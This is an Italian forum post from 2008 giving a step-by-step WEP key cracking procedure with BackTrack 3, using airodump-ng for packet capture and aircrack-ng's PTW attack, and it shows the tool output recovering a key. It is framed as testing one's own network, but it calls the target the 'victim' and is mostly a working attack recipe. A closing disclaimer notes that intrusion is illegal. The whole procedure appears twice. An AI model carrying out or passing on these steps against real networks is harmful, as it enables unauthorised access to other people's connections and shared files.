- 15 Gennaio 2008
- 1.144
- 0
- Miglior risposta
- 0
Dovete testare la vostra linea wireless ed avete poco tempo? Come tutti ben sappiamo il pericolo è sempre dietro l’angolo e per questo è necessario prevenire, scopriremo oggi come un qualsiasi malintenzionato potrebbe facilmente accedere alla nostra connessione internet, sfruttarla, ed entrare in possesso dei vostri file condivisi; il tutto in 5minuti e 10 secondi.
Componenti utilizzati:
- 1 router wi-fi collegato al fisso
- 1 portatile avente scheda wireless.
Ricordo che in questo procedimento ho cercato di eliminare ogni passaggio superfluo, riducendo i tempi ed ottimizzando l’intera procedura.
1) Inseriamo la distro live di backtrack3 nel laptop e carichiamola.
2) Apro il terminale e digitiamo “iwconfig” –>controllo che non sia associata a niente la scheda, essendo la distro live, come impostazione di default non dovreste modificare niente.
3)da terminale “airodump-ng -c 11 –write dump wlan0 “, dove 11–>è il canale e wlan0 è l’interfaccia.
4) una volta raccolti circa 50000 pacchetti…ci ha messo davvero pochissimo..ho dato da terminale:
aircrack-ng -z -b mac_ap dump-01*.cap
*mac_ap: è ovviamente il mac della scheda “vittima”
* dump-01.cap –> è il nome del file con il quale i pacchetti vengono catturati(ho notato che questo valore è incrementale).
dopo circa dieci secondi la shell mi restituisce:
opening dump-01.cap
attack will be restarted every 5000 captured ivs.
starting PTW attack with 50518ivs.
KEY FOUND! [1*:77:1E:1*:*8]
Decrypted correctly: 100%
Per motivi di privacy ovviamente ho alterato la pass con degli asterischi, fatene buon uso, ricordo che violare reti altrui è illegale e punibile.
Alcune precisazioni:
- la chiave in questione era una wep a 64bit
- il router era un Netgear v3
- Per capire il tutorial bisogna avere una minima base.
-----------------------------------------------------
Fonte:
Componenti utilizzati:
- 1 router wi-fi collegato al fisso
- 1 portatile avente scheda wireless.
Ricordo che in questo procedimento ho cercato di eliminare ogni passaggio superfluo, riducendo i tempi ed ottimizzando l’intera procedura.
1) Inseriamo la distro live di backtrack3 nel laptop e carichiamola.
2) Apro il terminale e digitiamo “iwconfig” –>controllo che non sia associata a niente la scheda, essendo la distro live, come impostazione di default non dovreste modificare niente.
3)da terminale “airodump-ng -c 11 –write dump wlan0 “, dove 11–>è il canale e wlan0 è l’interfaccia.
4) una volta raccolti circa 50000 pacchetti…ci ha messo davvero pochissimo..ho dato da terminale:
aircrack-ng -z -b mac_ap dump-01*.cap
*mac_ap: è ovviamente il mac della scheda “vittima”
* dump-01.cap –> è il nome del file con il quale i pacchetti vengono catturati(ho notato che questo valore è incrementale).
dopo circa dieci secondi la shell mi restituisce:
opening dump-01.cap
attack will be restarted every 5000 captured ivs.
starting PTW attack with 50518ivs.
KEY FOUND! [1*:77:1E:1*:*8]
Decrypted correctly: 100%
Per motivi di privacy ovviamente ho alterato la pass con degli asterischi, fatene buon uso, ricordo che violare reti altrui è illegale e punibile.
Alcune precisazioni:
- la chiave in questione era una wep a 64bit
- il router era un Netgear v3
- Per capire il tutorial bisogna avere una minima base.
-----------------------------------------------------
Fonte:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!